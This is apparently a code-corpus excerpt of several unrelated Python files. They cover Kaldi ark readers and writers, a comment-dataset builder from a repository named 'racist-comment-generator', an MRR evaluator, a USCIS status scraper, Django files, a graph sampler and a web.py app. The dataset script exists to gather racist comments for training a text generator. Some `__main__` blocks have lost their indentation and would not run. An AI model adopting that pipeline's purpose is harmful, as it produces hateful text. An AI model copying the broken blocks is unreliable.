        """
        Set the ark file to be read later
        """
        if self.arkfp is not None:
            raise IOError('call close() first')
        self.arkfp = open(arkfile, 'rb')
        self.curr_arkfile = arkfile

    def close(self):
        """
        Close the file pointer if it is opened
        """
        if self.arkfp is not None:
            self.arkfp.close()
            self.arkfp = None
            self.curr_arkfile = None
        if self.arkdata is not None:
            self.arkdata = {}
            self.uttids = []

    def seek(self, position_in_bytes):
        """
        Skip the file pointer. You can pick up the file position from .scp file
        """
        if self.arkfp is not None:
            self.arkfp.seek(position_in_bytes, 0)
class KaldiFeatArkReader(KaldiArkReader):
    """
    Read a Kaldi .feat.ark file per utterance iteratively
    """
    def __init__(self, store_image=False):
        KaldiArkReader.__init__(self, store_image)

    def __iter__(self):
        """
        Yield a one-entry dict per utterance: {utterance ID: feature matrix}
        where each row vector corresponds to a feature vector per frame.

        :returns: dict of (string, numpy matrix of shape (frames, dim))
        """
        uttid = b''
        while True:
            arkdata = self.arkfp.read(1)
            if arkdata == b'':
                # End of ark file. PEP 479 (Python 3.7+) turns an explicit
                # `raise StopIteration` inside a generator into a
                # RuntimeError, so terminate with a plain return instead.
                return
            c = struct.unpack('<s', arkdata)[0]
            if c == b' ':
                # A space ends the utterance ID; a binary header follows.
                arkdata = self.arkfp.read(1) # skip '\0'
                arkdata = self.arkfp.read(4) # read the end symbol 'BFM '
                endSym = struct.unpack('<4s', arkdata)[0]
                if endSym != BFM_SYM:
                    raise ValueError('ERROR: %s could not find BFM but %s' %(self.curr_arkfile, endSym))
                arkdata = self.arkfp.read(1) # skip one byte data '\x04'
                arkdata = self.arkfp.read(4) # read no. frames
                frameN = struct.unpack( '<I', arkdata )[0]
                arkdata = self.arkfp.read(1) # skip one byte data '\x04'
                arkdata = self.arkfp.read(4) # read the dimension
                featD = struct.unpack( '<I', arkdata )[0]
                coeffN = frameN * featD
                # read the coefficients (little-endian float32)
                arkdata = self.arkfp.read(coeffN * 4)
                feMat = numpy.reshape(struct.unpack('<%df' %(coeffN), arkdata), (frameN,featD))
                uttid = uttid.decode()
                if self.arkdata is not None:
                    self.accumulate(uttid, feMat)
                uttid2data = {uttid:feMat}
                uttid = b''
                yield uttid2data
            else:
                # Still reading the utterance ID, one byte at a time.
                uttid += c
class KaldiIntVectorArkReader(KaldiArkReader):
    """
    Read a Kaldi integer-vector file per utterance iteratively
    """
    def __init__(self, store_image=False):
        KaldiArkReader.__init__(self, store_image)
    def __iter__(self):
        """
        Yield a one-entry dict per utterance: {utterance ID: int vector}
        :returns: dict of (string, numpy int array)
        """
        uttid = b''
        while True:
            arkdata = self.arkfp.read(1)
            if arkdata == b'':
                # End of ark file ends the generator cleanly.
                break
            c = struct.unpack('<s', arkdata)[0]
            if c == b' ':
                # A space ends the utterance ID; a binary header follows.
                arkdata = self.arkfp.read(1) # skip '\0'
                arkdata = self.arkfp.read(1) # read the end symbol 'B'
                endSym = struct.unpack('<s', arkdata)[0]
                if endSym != BIV_SYM:
                    raise ValueError('ERROR: %s: Unmatched symbol %s!=%s' %(self.curr_arkfile, endSym, BIV_SYM))
                arkdata = self.arkfp.read(1) # skip one byte data '\x04'
                arkdata = self.arkfp.read(4) # read no. frames
                frameN = struct.unpack('<i', arkdata)[0]
                # read the coefficients
                vals = []
                for i in range(frameN):
                    # Each value is preceded by a 1-byte size tag.
                    arkdata = self.arkfp.read(1)
                    arkdata = self.arkfp.read(4)
                    vals.append(struct.unpack('<i', arkdata)[0])
                intVec = numpy.array(vals)
                uttid = uttid.decode()
                if self.arkdata is not None:
                    self.accumulate(uttid, intVec)
                uttid2data = {uttid:intVec}
                uttid = b''
                yield uttid2data
            else:
                # Still reading the utterance ID, one byte at a time.
                uttid += c
class KaldiWavArkReader(KaldiArkReader):
    """
    Read a Kaldi .wav.ark file per utterance iteratively
    """
    def __init__(self, store_image=False):
        KaldiArkReader.__init__(self, store_image)
        self.riff_header = None     # raw 44-byte RIFF header of the last utterance
        self.samplerate = None      # sample rate of the last utterance
        self.num_channels = None    # channel count of the last utterance

    def get_riff_header(self):
        """Return the raw 44-byte RIFF header of the utterance read last."""
        return self.riff_header

    def get_samplerate(self):
        """Return the sample rate of the utterance read last."""
        return self.samplerate

    def get_num_channel(self):
        """Return the number of channels of the utterance read last."""
        return self.num_channels

    def __iter__(self):
        """
        Yield a one-entry dict per utterance:
        {utterance ID: audio samples as a numpy.int16 vector}
        """
        uttid = b''
        while True:
            arkdata = self.arkfp.read(1)
            if arkdata == b'':
                # End of ark file. PEP 479 (Python 3.7+) turns an explicit
                # `raise StopIteration` inside a generator into a
                # RuntimeError, so terminate with a plain return instead.
                return
            c = struct.unpack('<s', arkdata)[0]
            if c == b' ':
                # read the 44 Byte header block of the RIFF file
                riff_header = self.arkfp.read(44) # skip '\0'
                endSym = struct.unpack('<4s',riff_header[0:4])[0]
                dataLength = struct.unpack('<L', riff_header[40:44])[0]
                bitsPerSample = struct.unpack('<h', riff_header[34:36])[0]
                # nsamps = int(dataLength / (bitsPerSample/8)) # divide 2 (Byte)
                self.samplerate = struct.unpack('<L', riff_header[24:28])[0]
                self.num_channels = struct.unpack('<h', riff_header[22:24])[0]
                if endSym != WAV_SYM:
                    raise ValueError('ERROR: %s: could not find %s but %s' %(self.curr_arkfile, WAV_SYM, endSym))
                if bitsPerSample != 16:
                    raise ValueError('ERROR: %s: expecting utterance with int16 format but %d bits per sample.' % (self.curr_arkfile, bitsPerSample))
                uttBinary = self.arkfp.read(dataLength)
                # expecting 16 bit per sample
                uttInt = [struct.unpack('<h', uttBinary[i:i+2]) for i in numpy.arange(0,len(uttBinary), 2)]
                samples = numpy.array(numpy.int16(numpy.resize(uttInt, (len(uttInt),))))
                self.riff_header = riff_header
                uttid = uttid.decode()
                if self.arkdata is not None:
                    self.accumulate(uttid, samples)
                uttid2data = {uttid:samples}
                uttid = b''
                yield uttid2data
            else:
                # Still reading the utterance ID, one byte at a time.
                uttid += c
class KaldiArkWriter:
    """
    Base class for writing a Kaldi ark file
    """
    def __init__(self):
        self.arkfp = None  # file object of the ark file currently open for writing

    def __enter__(self):
        # Context-manager entry. The original method was misspelled '__entry__',
        # which made 'with KaldiArkWriter() as w:' raise AttributeError.
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()

    def open(self, arkfile):
        """Open *arkfile* for binary writing; raises IOError if a file is already open."""
        if self.arkfp is not None:
            raise IOError('call close() first')
        self.arkfp = open(arkfile, 'wb')

    def close(self):
        """Close the ark file if one is open; safe to call repeatedly."""
        if self.arkfp is not None:
            self.arkfp.close()
            self.arkfp = None
class KaldiFeatArkWriter(KaldiArkWriter):
    """
    Write utterance data as a Kaldi .feat.ark file
    """

    def __init__(self):
        KaldiArkWriter.__init__(self)

    def write(self, uttid2feats, uttids=None):
        """Serialize each utterance's float matrix: '<uttid> \\0<marker>' header, dims, then row-major float32."""
        if uttids is None:
            uttids = list(uttid2feats.keys())
        for uttid in uttids:
            feat_mat = uttid2feats[uttid]
            num_frames = len(feat_mat)
            feat_dim = len(feat_mat[0])
            # Header: utterance id + space, NUL, binary-float-matrix marker, then both dims
            header = b''.join(struct.pack('<c', ch.encode()) for ch in uttid + ' ')
            header += struct.pack('<c', NULLC)
            header += b''.join(struct.pack('<c', ch.encode()) for ch in BFM_SYM.decode())
            header += struct.pack('<c', FEAT_BYTE_SIZE) + struct.pack('<I', num_frames)
            header += struct.pack('<c', FEAT_BYTE_SIZE) + struct.pack('<I', feat_dim)
            self.arkfp.write(header)
            # Payload: every coefficient as little-endian float32, frame by frame
            payload = b''.join(struct.pack('<f', coeff)
                               for frame in feat_mat
                               for coeff in frame)
            self.arkfp.write(payload)
            self.arkfp.flush()
class KaldiIntVectorArkWriter(KaldiArkWriter):
    """
    Write utterance data as a Kaldi int-vector ark file
    """

    def __init__(self):
        KaldiArkWriter.__init__(self)

    def write(self, uttid2feats, uttids=None):
        """Serialize each utterance's int vector: '<uttid> \\0<marker><size><len>' header, then size-tagged int32s."""
        if uttids is None:
            uttids = list(uttid2feats.keys())
        for uttid in uttids:
            vec = uttid2feats[uttid]
            # Header: utterance id + space, NUL, binary-int-vector marker, vector length
            header = b''.join(struct.pack('<c', ch.encode()) for ch in uttid + ' ')
            header += struct.pack('<c', NULLC)
            header += b''.join(struct.pack('<c', ch.encode()) for ch in BIV_SYM.decode())
            header += struct.pack('<c', FEAT_BYTE_SIZE) + struct.pack('<I', len(vec))
            self.arkfp.write(header)
            # Payload: each entry is prefixed by its byte-size marker
            payload = b''.join(struct.pack('<c', FEAT_BYTE_SIZE) + struct.pack('<i', value)
                               for value in vec)
            self.arkfp.write(payload)
            self.arkfp.flush()
def correct_chunk_size(numSamples, riff_header):
    """
    Correct the data length in header information; see http://soundfile.sapp.org/doc/WaveFormat/ for details
    """
    bits_per_sample = struct.unpack('<h', riff_header[34:36])[0]
    data_length = numSamples * (bits_per_sample // 8)
    # total RIFF chunk size = 36 bytes of header fields after the size slot + data
    total_chunk_size = 36 + data_length
    return b''.join([
        riff_header[0:4],
        struct.pack('<L', total_chunk_size),
        riff_header[8:40],
        struct.pack('<L', data_length),
        riff_header[44:],
    ])
class KaldiWavArkWriter(KaldiArkWriter):
    """
    Write utterance data as a Kaldi .wav.ark file
    """

    def __init__(self):
        KaldiArkWriter.__init__(self)

    def write(self, uttid2feats, uttid2headers, uttids=None):
        """Write each utterance as '<uttid> ' + corrected RIFF header + int16 samples."""
        if uttids is None:
            uttids = list(uttid2feats.keys())
        for uttid in uttids:
            id_token = b''.join(struct.pack('<c', ch.encode()) for ch in uttid + ' ')
            self.arkfp.write(id_token)
            samples = uttid2feats[uttid]
            # Patch the chunk sizes so the header matches the actual sample count
            fixed_header = correct_chunk_size(len(samples), uttid2headers[uttid])
            self.arkfp.write(fixed_header)
            payload = b''.join(struct.pack('<h', samp) for samp in samples)
            self.arkfp.write(payload)
            self.arkfp.flush()

    def dump_riff_file(self, riff_file, uttid):
        """
        Dump the data in a RIFF file into the wav ark file
        """
        id_token = b''.join(struct.pack('<c', ch.encode()) for ch in uttid + ' ')
        self.arkfp.write(id_token)
        with open(riff_file, 'rb') as riff_fh:
            self.arkfp.write(riff_fh.read())
        self.arkfp.flush()
def test():
    """CLI smoke test: copy an ark file through the matching reader/writer pair."""
    import argparse

    def build_parser():
        p = argparse.ArgumentParser(description='List utterance IDs in the ark file')
        p.add_argument('-t', '--type', default='f', help='Ark file type (i/f/w)')
        p.add_argument('input_ark', help='input ark path')
        p.add_argument('output_ark', help='output ark path')
        return p

    args, _ = build_parser().parse_known_args()
    # Pick the reader/writer pair matching the requested ark flavor
    if args.type == 'f':
        reader, writer = KaldiFeatArkReader(), KaldiFeatArkWriter()
    elif args.type == 'w':
        reader, writer = KaldiWavArkReader(), KaldiWavArkWriter()
    else:
        reader, writer = KaldiIntVectorArkReader(), KaldiIntVectorArkWriter()
    reader.open(args.input_ark)
    writer.open(args.output_ark)
    for uttid2data in reader:
        uttid = list(uttid2data.keys())[0]
        print('uttid: %s' % uttid)
        if args.type == 'w':
            # wav writing additionally needs the RIFF header of the utterance
            writer.write(uttid2data, {uttid: reader.get_riff_header()})
        else:
            writer.write(uttid2data)
    reader.close()
    writer.close()
if __name__ == '__main__':
test()
| 1.609375 | 2 |
generate_dataset.py | birnbaum/racist-comment-generator | 2 | 12797672 | import mysql.connector
import progressbar
import argparse
import yaml
import re
import collections
def main():
    """Parse CLI arguments, load the YAML config, and run the dataset generation."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--out', type=str, default='data/racist/racist.txt',
                        help='text file where the data is written to')
    args = parser.parse_args()

    with open('config.yml', 'r') as c:
        # yaml.load without an explicit Loader is deprecated and can execute
        # arbitrary objects; safe_load parses plain config data just as well.
        config = yaml.safe_load(c)
    generate_dataset(args, config)
def iter_row(cursor, size=1000):
    """Lazily yield rows from a DB-API cursor, fetching *size* rows at a time."""
    while True:
        batch = cursor.fetchmany(size)
        if not batch:
            return
        yield from batch
def generate_dataset(args, config):
    """Stream comments from MySQL, group them into threads, and write the cleaned text to args.out."""
    cnx = mysql.connector.connect(user=config["database"]["user"],
                                  password=config["database"]["password"],
                                  host=config["database"]["host"],
                                  database=config["database"]["db"])
    cursor = cnx.cursor()
    cursor.execute('SELECT count(*) FROM comment')
    count = cursor.fetchone()[0]
    bar = progressbar.ProgressBar(max_value=count)

    # This query groups comments by posts and places subcomments after their parent comments to
    # have as much context between the comments as possible. Everything is sorted ASC by date.
    print('Executing SQL query...')
    cursor.execute('''
    # Parent comments
    SELECT p.message,
        user.name,
        post.created_time as post_created_time,
        p.created_time as comment_created_time,
        Null as subcomment_created_time
    FROM comment p
    JOIN user ON user.id = p.user
    JOIN post ON post.id = p.post
    WHERE p.parent_comment IS NULL
    UNION
    # Child comments
    SELECT c.message,
        user.name,
        post.created_time as post_created_time,
        p.created_time as comment_created_time,
        c.created_time as subcomment_created_time
    FROM comment c
    JOIN user ON user.id = c.user
    JOIN comment p on p.id = c.parent_comment
    JOIN post ON post.id = p.post
    ORDER BY post_created_time ASC,
        comment_created_time ASC,
        subcomment_created_time ASC
    LIMIT 300000
    ''')
    print('Done')

    ds = Dataset()
    # As people tend to reference other people in subcomments, we collect the names of
    # all subcomment authors to remove them from the result in the end.
    authors = set()
    comments = []
    for (message, author, post_date, comment_date, subcomment_date) in bar(iter_row(cursor)):
        if subcomment_date is None:  # parent comment: flush the previous thread
            ds.push(comments, authors)
            authors = {author}
            comments = [message]
        else:  # child comment: extend the current thread
            authors.add(author)
            comments.append(message)
    # Flush the final thread; the loop above only pushes when a new parent starts,
    # so without this the last batch of comments would be silently dropped.
    ds.push(comments, authors)
    ds.write(args.out)
class Dataset:
    """Accumulates cleaned comment batches and renders them into one cp1252-encoded blob."""

    def __init__(self):
        self.batches = []  # one cleaned text chunk per comment thread
        self.vocab_counter = collections.Counter()  # character frequencies across all batches

    def write(self, outfile):
        """Writes the dataset to a text file"""
        output = self.create_output()
        ending = outfile.split('.')[-1]
        if ending == 'txt':
            with open(outfile, "wb") as f:
                f.write(output)
        # TODO add bzip
        else:
            raise ValueError('outfile has to be a .txt file')

    def push(self, comments, authors):
        """Adds a new batch of comments to the dataset. The set of authors is used to further clean the comments.

        Note: the original code decorated this method with @profile, which is only
        defined when running under kernprof/line_profiler and raised NameError on a
        normal import; the decorator has been removed.
        """
        lines = []
        for comment in comments:
            lines.extend(comment.replace('\r', '\n').split('\n'))
        txt = ''
        authors = [re.escape(author) for author in authors]
        for line in lines:
            line = self.remove_usernames(line, authors)
            if 4 < len(line) < 500:  # drop empty/near-empty and absurdly long lines
                txt += '> {}\n'.format(line)
        self.batches.append(txt)
        self.vocab_counter.update(txt)

    def remove_usernames(self, text, authors):
        """Removing user names that the crawler was not able to filter out because they were not returned in Graph API's message_tags"""
        # First remove the old fashioned @ tags
        if len(text) == 0 or ('@' in text and len(text.split(' ')) <= 3):
            return ''
        if text[0] == '@':
            text = re.sub('@ ?.*?((:|,|\.| {2})| .*?[:,. ])', '', text)
        else:
            text = re.sub('@', '', text)
        # Then the names of all the authors from the comment and its subcomments because they mainly reference each other
        text = re.sub('({})'.format('|'.join(authors)), '', text)
        return text.strip()

    def create_output(self):
        """Generates one big cp1252 string"""
        output = ''.join(self.batches)
        # Remove all characters that appear in less than 0.002% of the cases
        threshold = len(output) * 0.00002
        chars_to_remove = []
        for char, count in reversed(self.vocab_counter.most_common()):
            if count < threshold:
                chars_to_remove.append(char)
            else:
                break
        if chars_to_remove:
            # Guard: with no characters to remove the pattern would be '[]',
            # which is an invalid (unterminated) regex character class.
            output = re.sub('[' + re.escape(''.join(chars_to_remove)) + ']', '', output)
        return output.encode("cp1252", errors="ignore")

    def merge_lines(self, lines):
        """Cleans and selects qualifying lines and merges them to a string"""
        # NOTE(review): self.clean_tags is not defined anywhere in this class,
        # so calling this method raises AttributeError. It appears to be dead
        # code superseded by push()/remove_usernames() — confirm before use.
        txt = ''
        for line in lines:
            line = self.clean_tags(line)
            if 4 < len(line) < 500:
                txt += '> {}\n'.format(line)
        return txt
if __name__ == '__main__':
main() | 1.875 | 2 |
SCODE-R/mrr.py | rizwan09/REDCODER | 22 | 12797680 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# Adapted from https://github.com/microsoft/CodeXGLUE/blob/main/Text-Code/NL-code-search-Adv/evaluator/evaluator.py
import logging
import sys, json
import numpy as np
def read_answers(filename):
    """Build the gold answer map: each line index maps to itself (index-aligned retrieval)."""
    answers = {}
    with open(filename) as fh:
        for idx, raw in enumerate(fh):
            # Parse every line to fail fast on malformed JSON, even though
            # only the line index is used as both key and answer.
            json.loads(raw.strip())
            key = str(idx)
            answers[key] = key
    return answers
def read_predictions(filename):
    """Read ranked predictions: line index -> the 'answers' list of that JSON line."""
    predictions = {}
    with open(filename) as fh:
        for idx, raw in enumerate(fh):
            record = json.loads(raw.strip())
            predictions[str(idx)] = record['answers']
    return predictions
def calculate_scores(answers, predictions):
    """Compute Mean Reciprocal Rank of *predictions* against *answers* (exits on a missing key)."""
    scores = []
    for key in answers:
        if key not in predictions:
            logging.error("Missing prediction for url {}.".format(key))
            sys.exit()
        # Reciprocal rank of the first hit; 0 if the answer never appears
        for rank, idx in enumerate(predictions[key]):
            if idx == answers[key]:
                scores.append(1 / (rank + 1))
                break
        else:
            scores.append(0)
    return {'MRR': round(np.mean(scores), 4)}
def main():
    """CLI entry point: read gold answers and predictions, print MRR."""
    import argparse
    parser = argparse.ArgumentParser(description='Evaluate leaderboard predictions for POJ-104 dataset.')
    parser.add_argument('--answers', '-a', help="filename of the labels, in txt format.")
    parser.add_argument('--predictions', '-p', help="filename of the leaderboard predictions, in txt format.")
    args = parser.parse_args()

    print("reading gold answers")
    gold = read_answers(args.answers)
    print("reading predcited answers")
    preds = read_predictions(args.predictions)
    print("computing scores")
    print(calculate_scores(gold, preds))
if __name__ == '__main__':
main()
# python mrr.py -a /home/wasiahmad/workspace/projects/NeuralKpGen/data/scikp/kp20k_separated/KP20k.test.jsonl -p /home/rizwan/DPR/predictions_KP20k.jsonl
| 2.359375 | 2 |
uscisstatus/__init__.py | meauxt/uscisstatus | 2 | 12797688 | <filename>uscisstatus/__init__.py
from lxml import html
import re
import requests
from datetime import datetime
# Regex matching dates formatted like "January 1, 2019" in the status text
CASE_DATE_PATTERN = r"[(A-Za-z)]*\s[\d]*,\s[\d]*"
# USCIS case-status endpoint queried via POST
URL = "https://egov.uscis.gov/casestatus/mycasestatus.do"
# Form field names / values expected by the endpoint
APP_RECEIPT_NUM = "appReceiptNum"
INIT_CASE_SEARCH = "initCaseSearch"
CASE_STATUS = "CHECK STATUS"
# XPath locating the paragraph that holds the status message
UPDATE_TEXT_XPATH = "/html/body/div[2]/form/div/div[1]/div/div/div[2]/div[3]/p/text()"
# Scraping artifacts to strip from the extracted text
MISSING_URL_PATTEN = "','|', '"
TEXT_FILTER_PATTERN = r"['\[\]]"
def get_case_status(case_id):
    """
    Fetch and parse the USCIS case status page for *case_id*.

    :param case_id: USCIS receipt number
    :return: dict with 'status' (cleaned message text) and 'date' (last update, MM/DD/YYYY)
    :raises ValueError: if the page has no status text or no parsable date
    """
    data = {APP_RECEIPT_NUM: case_id,
            INIT_CASE_SEARCH: CASE_STATUS}
    r = requests.post(URL, data=data)
    content = html.fromstring(r.content)
    text = str(content.xpath(UPDATE_TEXT_XPATH))
    if len(text) < 2:
        raise ValueError("Please make sure you case id is valid")
    # Use the module-level patterns; the original duplicated both of them
    # as inline literals, inviting drift from the named constants.
    text = str(re.sub(MISSING_URL_PATTEN, 'USCIS website', text))
    status_message = re.sub(TEXT_FILTER_PATTERN, ' ', text)
    p = re.search(CASE_DATE_PATTERN, status_message)
    if p is not None:
        match = p.group(0)
        last_update_date = datetime.strptime(str(match), "%B %d, %Y")
        last_update_date = last_update_date.strftime('%m/%d/%Y')
        return {'status': status_message, 'date': last_update_date}
    else:
        raise ValueError("Please make sure you case id is valid")
app/__init__.py | thomasbhatia/kigata | 1 | 12797696 | from . import factory
def create_app(settings_override=None):
    """Return the app API application instance built by the shared factory."""
    return factory.create_app(__name__, __path__, settings_override)
| 1.101563 | 1 |
avaloq/avaloq/urls.py | Tankiolegend/AvaloqCodingWebsite | 0 | 12797704 | from django.contrib import admin
from django.urls import path, include
from avaloq_app import views
# Route table: root review page, app-specific URLs, Django admin, and
# django-registration account flows.
urlpatterns = [
    path('', views.review, name='review'),
    path('avaloq/', include('avaloq_app.urls')),
    path('admin/', admin.site.urls),
    path('accounts/', include('registration.backends.default.urls')),
]
# Project-wide error handlers (dotted view paths resolved by Django)
handler404 = 'avaloq_app.views.page_not_found'
handler500='avaloq_app.views.server_error'
handler400='avaloq_app.views.bad_request'
handler403='avaloq_app.views.permission_denied'
| 1.023438 | 1 |
2016/starter.py | iKevinY/advent | 11 | 12797712 | import os # NOQA
import sys # NOQA
import re # NOQA
import math # NOQA
import fileinput
from collections import Counter, deque, namedtuple # NOQA
from itertools import count, product, permutations, combinations, combinations_with_replacement # NOQA
from utils import parse_line, mul, factors, memoize, primes, new_table, Point # NOQA
# Itertools Functions:
# product('ABCD', repeat=2) AA AB AC AD BA BB BC BD CA CB CC CD DA DB DC DD
# permutations('ABCD', 2) AB AC AD BA BC BD CA CB CD DA DB DC
# combinations('ABCD', 2) AB AC AD BC BD CD
# combinations_with_replacement('ABCD', 2) AA AB AC AD BB BC BD CC CD DD
# Accumulators commonly used by puzzle solutions
total = 0
result = []
table = new_table(None, width=2, height=4)
# Process the puzzle input line by line; the commented lines below are
# alternative parsing recipes to swap in depending on the input format.
for i, line in enumerate(fileinput.input()):
    line = line.strip()
    # data = [x for x in line.split(', ')]
    # data = [x for x in line]
    # data = [int(x) for x in line.split()]
    # data = re.findall(r'(\w+)', line)
    data = parse_line(r'', line)
    # Print the first parsed line as a sanity check of the chosen parser
    if i == 0:
        print(data)
| 2.15625 | 2 |
currency_calculator/__init__.py | jie17/PyCurrency | 1 | 12797720 | from .PyCurrency import get, convert | 0.785156 | 1 |
backend/stock/migrations/0024_auto_20210218_2347.py | fengxia41103/stock | 1 | 12797728 | <reponame>fengxia41103/stock<filename>backend/stock/migrations/0024_auto_20210218_2347.py
# Generated by Django 3.1.6 on 2021-02-18 23:47
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 3.1.6 (see file header); do not edit by hand.
    # Renames BalanceSheet.ac -> ar (presumably accounts receivable — confirm)
    # and refreshes two altered field definitions.
    dependencies = [
        ('stock', '0023_auto_20210216_1552'),
    ]
    operations = [
        migrations.RenameField(
            model_name='balancesheet',
            old_name='ac',
            new_name='ar',
        ),
        migrations.AlterField(
            model_name='incomestatement',
            name='total_revenue',
            field=models.FloatField(blank=True, default=0, null=True, verbose_name='Sales'),
        ),
        migrations.AlterField(
            model_name='mystrategyvalue',
            name='method',
            field=models.IntegerField(choices=[(1, 'daily return'), (2, 'overnight return'), (3, 'night day consistency'), (4, 'two daily trend'), (5, 'night day compounded return')], default=1),
        ),
    ]
| 0.683594 | 1 |
sacorg/algorithms/blitzstein_diaconis/blitzstein_diaconis.py | abdcelikkanat/sacorg | 0 | 12797736 | <gh_stars>0
from sacorg.utils import *
from sacorg.algorithms.isgraphical import *
def s(deg_seq):
    """
    Generates a sample graph for a given degree sequence d
    :param deg_seq: Given degree sequence
    :return E, p, c: edges with vertex labels starting from 1,
                     probability of the generated graph and
                     the number of edge combinations
    """
    # Copy the given degree sequence to use it as residual sequence
    r = deg_seq.copy()
    p = 1.0 # probability of the generated graph
    c = 1 # the number of edge combinations for the same graph that can be generated by the algorithm
    E = [] # list of edges
    N = len(r) # length of the sequence
    adjacentVertices = [[] for _ in range(N)] # stores the vertices which are adjacent
    # run until residual sequence completely becomes 0 vector
    while np.any(r != 0):
        # Get the index of vertex having minimum degree greater than 0
        i = np.where(r == np.amin(r[r > 0]))[0][-1]
        c *= factorial(r[i])
        # Connect vertex i to candidate neighbors until its residual degree is exhausted
        while r[i] != 0:
            # NOTE(review): np.int is deprecated/removed in NumPy >= 1.20; use int there.
            J = np.asarray([], dtype=np.int) # Construct candidate list J
            possibleVertices = [o for o in np.arange(N) if (r[o] > 0 and o != i and (o not in adjacentVertices[i]))]
            for j in possibleVertices:
                # Decrease degrees by one
                (r[i], r[j]) = (r[i] - 1, r[j] - 1)
                # add the vertex j to candidate list J, if residual sequence is graphical
                if is_graphical(r):
                    J = np.append(J, j)
                # Increase degrees by one
                (r[i], r[j]) = (r[i] + 1, r[j] + 1)
            # Pick a vertex j in the candidate list J with probability proportional to its degree d_j
            degrees = np.asarray([r[u] for u in J])
            prob = degrees / float(np.sum(degrees))
            j = np.random.choice(J, p=prob, size=1)[0]
            # Add the found edge to the edge lists
            if i < j:
                E.append([i + 1, j + 1]) # indices start from 1
            else:
                E.append([j + 1, i + 1]) # indices start from 1
            # Add the chosen vertex to the list in order to not choose it again
            adjacentVertices[i].append(j)
            # Decrease degrees by 1
            (r[i], r[j]) = (r[i] - 1, r[j] - 1)
            # accumulate the probability of this particular choice
            p *= prob[J == j][0]
    # Sort the edge sequences
    E.sort()
    return E, p, c
def get_sample(deg_seq, num_of_samples, verbose=False):
    """
    Generates graphs realizing the degree sequence 'deg_seq' with vertex labels {1,...,len(deg_seq)}
    :param deg_seq: Degree sequence
    :param num_of_samples: Number of samples which will be generated
    :param verbose: if True, print the total computation time
    :return: list of edge lists, one per sample; [] if deg_seq is empty or not graphical
    """
    # Get the initial time
    # NOTE(review): time.clock() was removed in Python 3.8 — use time.process_time() there.
    time_start = time.clock()

    # If the sequence is empty or is not graphical there is nothing to sample
    if len(deg_seq) == 0 or not is_graphical(deg_seq):
        if verbose:
            time_elapsed = (time.clock() - time_start)
            # parenthesized print: identical output on Python 2, valid syntax on Python 3
            print("Total computation time : " + str(time_elapsed))
        return []

    edges = []
    for _ in range(num_of_samples):
        # Generate one sample graph and keep only its edge list
        e, p, c = s(deg_seq)
        edges.append(e)

    # Get the total computation time
    time_elapsed = (time.clock() - time_start)
    if verbose:
        print("Total computation time : " + str(time_elapsed))

    # Return the edges
    return edges
def count(deg_seq, num_of_samples=1000, verbose=False):
    """
    Estimates the number of graphs satisfying the degree sequence
    :param deg_seq: Degree sequence
    :param num_of_samples: number of samples used in estimation
    :param verbose: if True, print the total computation time
    :return estimate, std: importance-sampling estimate of the number of graphs
                           realizing deg_seq, and the sample standard deviation
    """
    # Get initial time
    # NOTE(review): time.clock() was removed in Python 3.8 — use time.process_time() there.
    time_start = time.clock()

    # If the sequence is empty or is not graphical, there are no realizations
    if len(deg_seq) == 0 or not is_graphical(deg_seq):
        if verbose:
            time_elapsed = (time.clock() - time_start)
            # parenthesized print: identical output on Python 2, valid syntax on Python 3
            print("Total computation time : " + str(time_elapsed))
        return 0.0, 0.0

    # Importance weights: each sample contributes 1 / (c * p)
    weights = np.zeros(num_of_samples, dtype=float)
    for i in range(num_of_samples):
        (edges, p, c) = s(deg_seq)
        weights[i] = 1.0 / float(c * p)

    estimate = (1.0 / float(num_of_samples)) * np.sum(weights)
    std = np.std(weights, ddof=1)

    # Get the total computation time
    time_elapsed = (time.clock() - time_start)
    if verbose:
        print("Total computation time : " + str(time_elapsed))

    return estimate, std
backend/ArrowSelection/Application.py | Ezetowers/tp-final-fallas-I | 0 | 12797744 | import sys, logging, time, random
import web
import json
from intellect.Intellect import Intellect
from MyIntellect import MyIntellect
from Question import Question
from Arrow_Model import Arrow_Model
from Model import Model
class Application(object):
    """web.py handler: runs browser-supplied archery parameters through the rule engine."""

    def __init__(self):
        # Load the rules
        self._myIntellect = MyIntellect()
        self._myIntellect.learn(
            self._myIntellect.local_file_uri('./rulesets/secondRuleSet.policy'))

    def GET(self):
        """Evaluate one request and return the recommended question/arrow model as JSON."""
        # Habilitate the cross-domain communication
        web.header('Access-Control-Allow-Origin', '*')
        web.header('Access-Control-Allow-Credentials', 'true')

        # Receive the data from the browser and create
        # the objects used by the policies
        user_data = web.input()
        self._model = Model()
        self._myIntellect.initialize()

        self.set_length(user_data)
        self.set_height(user_data)
        self.set_poundage(user_data)
        self.set_temperature(user_data)
        self.set_target_distance(user_data)

        self._question = Question()
        self._arrow_model = Arrow_Model()
        self._myIntellect.learn(self._model)
        self._myIntellect.reason()
        self._question.number = self._model.question
        self._arrow_model.value = self._model.arrow_model

        # Send the results to the browser on a json
        json_map = {'question': self._question.number,
                    'model': self._arrow_model.get_model_name()}
        return json.dumps(json_map)

    def _set_int_field(self, model_attr, user_data, field_name, label):
        """Copy int(user_data.<field_name>) into self._model.<model_attr>; log when the field is absent."""
        try:
            setattr(self._model, model_attr, int(getattr(user_data, field_name)))
        except AttributeError:
            logging.getLogger('ArrowSelection').error(
                '[APPLICATION] %s does not exists' % label)

    # The five setters below shared one copy-pasted implementation; they now
    # delegate to _set_int_field while keeping the original log messages.
    def set_length(self, user_data):
        self._set_int_field('arm_length', user_data, 'longitud', 'Arm_Length')

    def set_height(self, user_data):
        self._set_int_field('height', user_data, 'altura', 'Height')

    def set_poundage(self, user_data):
        self._set_int_field('poundage', user_data, 'libraje', 'Poundage')

    def set_temperature(self, user_data):
        self._set_int_field('temperature', user_data, 'temperatura', 'Temperature')

    def set_target_distance(self, user_data):
        self._set_int_field('target_distance', user_data, 'distancia', 'Target Distance')
| 1.484375 | 1 |
backend/django/KlasHelper/model.py | Ryulth/KlasHelperRemaster | 7 | 12797752 | # This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
#
# Also note: You'll have to insert the output of 'django-admin sqlcustom [app_label]'
# into your database.
from __future__ import unicode_literals
from django.db import models
